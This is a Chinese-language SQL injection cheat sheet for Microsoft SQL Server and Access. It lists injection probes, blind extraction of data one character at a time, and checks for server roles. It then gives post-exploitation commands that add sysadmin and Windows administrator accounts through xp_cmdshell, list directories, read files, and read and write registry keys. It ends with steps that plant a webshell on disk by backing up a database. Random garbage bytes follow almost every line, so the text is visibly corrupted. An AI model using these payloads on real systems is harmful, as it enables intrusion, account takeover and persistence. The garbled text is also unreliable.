1.判断是否有注入;and 1=1 ;and 1=2 �BnG{)�\�s
2.初步判断是否是mssql ;and user>0 O4!!*0(+91
?z�3|^oU~d
3.注入参数是字符'and [查询条件] and ''=' L%� T%6p�_
�
`ghNS��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �z3M6<.��K
�P���)[QC�
5.判断数据库系统 U%�K�g�Lg#
�x�v�7nChB
;and (select count(*) from sysobjects)>0 mssql ^��Yo�2��R
/S9n!H:M�T
;and (select count(*) from msysobjects)>0 access ]s�qp^tQ`e
XcKyrh�;i�
0L�\�v��i�
6�Z-[-0o+g
6.猜数据库 ;and (select Count(*) from [数据库名])>0 GPAz���#0p
/+m7�J�"Km
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 m�@yx6[�E#
n*hRl�L���
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 XeozRfk%J|
^m�ZTk�i�4
9.(1)猜字段的ascii值(access) �(�Li)@Cn%
V_9��>��Z?
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 R/&C}6G�n�
/?�C6�oj1�
(2)猜字段的ascii值(mssql) 2'WdH1UrBc
t`0�(�5v��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 '�~7�6Y9mv
�.-:��6�L2
10.测试权限结构(mssql) 'x=�y:0�A�
Rp.F�G� �
B��tP�*R,>
_aOsFFB1KF
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �#~�[m�n_C
Ay\!�ohIS3
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- g%d&>�y?1r
4\Cb�4jq%/
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- }�q~xr�3#�
|y2cI,�&��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- m}�nA-��*
0'Qo eFK�G
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- WR>��2t&;E
�
h9��3��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �sJYs{�Wm
�[>f4��&yY
;and 1=(select IS_MEMBER('db_owner'));-- Y&��DC�5T]
q�\8�7<=9J
p%*!��]JRS
.�e�2��K\o
11.添加mssql和系统的帐户 y8\�4TjS�1
ZBfB4<M9xS
;exec master.dbo.sp_addlogin username;-- �:#�p!&Fi�
;exec master.dbo.sp_password null,username,password;-- pn�2�_ {8.
X�W�F�u�AE
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �c9�5�{X�y
?\Z-3l%�M�
;exec master.dbo.xp_cmdshell 'net user username password #&c}i�n�"!
6�99��5r%
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- x�keb�el`%
Xa32p_|5~�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- gL;ty�f�1P
1~P �^��g`
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t^1�c^RpTb
ZN�?�UkFnE
!Z�lNPPrq}
rhe;j/�/�`
12.(1)遍历目录 />9?�/&N6"
�l~Sn`%PgA
;create table dirs(paths varchar(100), id int) �u�a
�vv��
g�Rdg3�qvU
;insert dirs exec master.dbo.xp_dirtree 'c:\' f<�0n���j?
�p�#dpDjh�
;and (select top 1 paths from dirs)>0 ;1 �02ddRV
Ka�\%kB>*`
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) e�
RjpR?!\
Zj8aD-1]U^
�X����pd^^
xl��$#00|y
(2)遍历目录 (_�El�M>
K-�n�f@o+�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- nP��>*0F�q
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Y@K�p'+t(!
{<-� B�U[H
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 UC�3�4AKm�
<j.�bG� 7�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �kEE8c�W�3
ivbuS-f�=r
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 rE
bC��_<�
dZ7�+Iw;m
Osdw\NNH~M
��98os4}r�
13.mssql中的存储过程 �##�!)��}i
GiN\n�u<!�
xp_regenumvalues 注册表根键, 子键 B{SzC=4f}
�Wb"*9q�06
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �+M6qbIO�
t,.M�tU>K@
xp_regread 根键,子键,键值名 r c7"sIk�V
:hG?} �[-2
;exec xp_regread ��Y$ ;C�@I
d\dt�}&S 5
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 EIwTx:�{F�
x�aWm�wsym
xp_regwrite 根键,子键, 值名, 值类型, 值 Z�2WA�VSw
%�zs 1v�]
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ubIGs|�p2c
Dqe�/n�_Z
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��})|+�t�Z
�/�GNR�u
xp_regdeletevalue 根键,子键,值名 �R�V|: mI
�!�p1�OBS|
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �$T�t@X��u
��qbkvw�L9
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 dx@�#�6Fhy
���Pn�5@7~
N�
G1]!Vz5
mk1;22o{TX
14.mssql的backup创建webshell glh2CRU�j
I;L�$Nf�{v
use model 4��em7PmT�
r�:y��*l�4
create table cmd(str image); SHPaSq'�&N
&�3>ki�0L
insert into cmd(str) values (''); r+0"1�\�f3
7�ju�7�QyR
backup database model to disk='c:\l.asp';
=�O�w}�MX
<oPo?r|oM|
R)t"�`'6�|
'��bk�ec�C
15.mssql内置函数 mU�zNrkG(G
*~M�=2Fj;i
;and (select @@version)>0 获得Windows的版本号 =A<�kD�xqH
e%j+,�)�Ry
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �(��hd���^
b��m�c1�S
;and (select user_name())>0 爆当前系统的连接用户 t��sU.c"^n
OibW8A4Z1
;and (select db_name())>0 得到当前连接的数据库 FqQm��*�k_
`�ItM��n&P
{.z2n>1J{T
1#D�pj.cO#
16.简洁的webshell F�J��v=�5L
9�">�}@�1k
use model a����|32Pn
:HRJ49���a
create table cmd(str image); r��Ze"*$�e
G[�r�_|-^S
insert into cmd(str) values (''); 2;�5�EH�0
$uaw�Qf�+S
backup database model to disk='g:\wwwtest\l.asp';
